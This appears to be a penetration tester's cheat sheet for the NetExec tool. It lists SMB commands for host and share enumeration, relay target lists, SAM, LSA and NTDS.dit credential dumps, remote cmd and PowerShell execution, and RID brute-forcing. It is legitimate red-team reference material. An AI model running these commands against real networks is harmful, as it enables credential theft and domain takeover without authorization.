NetExec

Syntax is similar to CME (CrackMapExec).

Find IP/hostname/SMB signing/etc.:

netexec smb targets.txt

Generate a list of hosts with SMB signing disabled, for relays

netexec smb targets.txt --gen-relay-list relay.txt

Find hosts the user can log into or is admin on

netexec smb targets.txt -u user -p 'password'

Enumerate shares

netexec smb ip -u user -p 'password' --shares

Dump SAM

netexec smb ip -u user -p 'password' --sam

Dump LSA

netexec smb ip -u user -p 'password' --lsa

Run a cmd command

netexec smb ip -u user -p 'password' -x 'command'

Run a PowerShell command

netexec smb ip -u user -p 'password' -X 'command'

List users if the Guest account is enabled

netexec smb ip -u 'Guest' -p '' --rid-brute

List domain admins

netexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'

List logged-on users

netexec smb ip -u user -p 'password' --loggedon-users

Dump NTDS.dit - this is LOUD - USE WITH CAUTION

netexec smb dc-ip -u domain-admin-user -p 'password' --ntds

Database

View database

nxcdb

View creds grabbed via SMB (run inside nxcdb)

proto smb
creds
